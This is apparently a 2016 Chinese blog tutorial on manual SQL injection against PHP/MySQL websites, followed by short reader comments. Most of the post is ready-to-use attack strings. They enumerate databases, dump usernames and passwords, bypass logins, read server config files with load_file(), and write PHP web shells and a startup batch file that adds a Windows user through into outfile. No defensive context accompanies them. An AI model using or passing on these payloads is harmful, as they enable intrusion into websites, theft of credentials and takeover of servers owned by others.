PHP网站MySQL手工注入教程
  • 首页 > 网络安全培训
  • 作者:sunghost
  • 2016年2月17日 10:37 星期三
  • 浏览:2651 次
  • 字号:    
  • 评论:10 条
  • 字数:5234 个
  • 显示:1200px  1360px  1600px
  • 关灯  编辑
  • 时间:2016-2-17 10:37   浏览:2651  

    Mysql手工注入
    1、判断注入点:
    and 1=1
    and 1=2
    or 1=1
    2、判断字段长度
    order by 11
    3、报错
    and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11
    and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from information_schema.tables
    4、报基本信息
    database()//数据库名
    version()//版本
    user()//用户名
    @@version_compile_os//操作系统
    union select 1,user(),3,4,5,6,7,8,9,10,11
    union select 1,version(),3,4,5,6,7,8,9,10,11
    union select 1,database(),3,4,5,6,7,8,9,10,11
    5、列表名
    union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database() limit 0,1-- //表名
    union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=[十六进制数据库名]//列表名
    6、列字段
    union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=[十六进制表名] limit 0,1-- //列名
    union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=[十六进制表名]//列列名
    7、报账号密码

    union select 1,group_concat(username,0x5c,password),3,4,5,6,7,8,9,10,11 from [表名] //报出账号密码

    以上方法适合MySQL5.0以上版本。




    利用sqlmap工具进行MySQL注入语法如下

    利用sqlmap注入读取文件
    查询表名称
    进行查询
    sqlmap --sql-shell
    select load_file('/usr/www/inde.php');

    此处内容已隐藏,在文章留言框评论即可查看


    Mysql后台注入

    判断是否存在注入输入'
    爆当前数据库用户
    -99999999999' union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#
    报当前数据库名称
    -99999999999' union select 1 from (select count(*),concat(floor(rand(0)*2),(select database() limit 0,1))a from information_schema.tables group by a)b#
    报当前版本号
    -99999999999' union select 1 from (select count(*),concat(floor(rand(0)*2),(select version() limit 0,1))a from information_schema.tables group by a)b#

    爆当前数据库
    -99999999999' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
    爆表
    'and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x64656E67 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
    爆字段
    'and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x64656E67  and table_name=0x75736572 limit 0,1)) from
    information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#


    爆第二个表
    'and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x64656E67  and table_name=0x75736572 limit 1,1)) from
    information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    爆内容
    'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,user.username,0x27,0x7e) from user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    爆内容
    'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,user.password,0x27,0x7e) from user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    MySQL后台绕过

    select * from user where username='' and password=''
    输入:admin'#
    select * from user where username='admin'#' and password=''
    输入:admin' or '1=1
    select * from user where username='admin' or '1=1' and password=''

    Mysql读写load_file()函数的使用

    该函数是用来读取源文件的函数
    只能读取绝对路径的网页文件
    在使用load_file()时应先找到网站绝对路径
    例如:
    d:/www/xx/index.php
    /usr/src/apache/htdoc/index.php

    注意:
    1.路径符号 "\" 错误“\\”正确 “/” 正确
    2.转换十六进制数,就不要‘’ 

    查找网站根路径

    1.报错显示
    2.谷歌黑客
    site:目标网站 warning
    3.遗留文件 phpinfo info test php
    4.漏洞爆路径
    5.读取配置文件

    load_file()

    and 1=2 union select 1,load_file('C:\\Inetpub\\wwwroot\\mysql-sql\\inc\\set_sql.php'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
    and 1=2 union select 1,load_file(0x443A5C7068705C41504D53657276352E322E365C7777775C6874646F63735C335C636F6E6669672E706870),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

    c:/windows/system32/inetsrv/metabase.xml

    写入函数 into outfile 

    and 1=2 union select 1,"<?php @eval($_POST['sunghost']);?>",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into outfile 'C:/Inetpub/wwwroot/sunghost.txt'

    利用注入执行系统命令

    第一种方法:需要使用wamp环境搭建需要系统权限才能执行
     and 1=2 union select 1,"net user sunghost 123 /add",2,3,4,5,6 into outfile 'C://Documents and Settings/Administrator/「开始」菜单/程序/启动/1.bat'

    第二种方法:

    and 1=2 union select 1,"<pre><body><?  @system($_GET['sunghost']); ?></body></pre>",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into outfile 'C:/Inetpub/wwwroot/sunghost.php'

     您阅读这篇文章共花了: 
    二维码加载中...
    本文作者:sunghost      文章标题: PHP网站MySQL手工注入教程
    本文地址:http://www.sunghost.cn/?post=156 本文已被百度收录
    版权声明:若无注明,本文皆为“㊙️网络安全培训_SEO优化培训_上科互联网络培训学院”原创,转载请保留文章出处。
      昵称   邮箱   主页
    撒大声地  Google Chrome 62.0.3202.94 非主流操作系统 中国 移动 2017-12-13 20:01
    看看看看
    56  Google Chrome 50.0.2661.102 Windows 8.1 北京市 电信通 2016-12-14 17:30
    看看可能把
    你好  Google Chrome 45.0.2454.101 非主流操作系统 山东省德州市 移动 2016-10-18 11:43
    兔兔兔兔兔兔兔兔
    1 新疆克拉玛依市白碱滩区 联通 2016-09-06 14:24
    p神器学习下。
    六月飞雪 北京市 教育信息网 2016-08-29 15:26
    谢谢分享
    挑逗 广东省湛江市 电信 2016-08-22 00:50
    感谢分享。支持
    123123123 北京市 联通 2016-06-21 17:15
    放大fads发生的f啊阿发阿迪啊ads
    121212 广东省东莞市 电信 2016-04-20 14:11
    111打杂的发送到
    hackde 广东省东莞市 电信 2016-04-07 16:57
    学习下,感谢分享。支持。。。
    MySQL注入学习 广东省东莞市 电信 2016-03-12 16:38
    sqlmap神器学习下。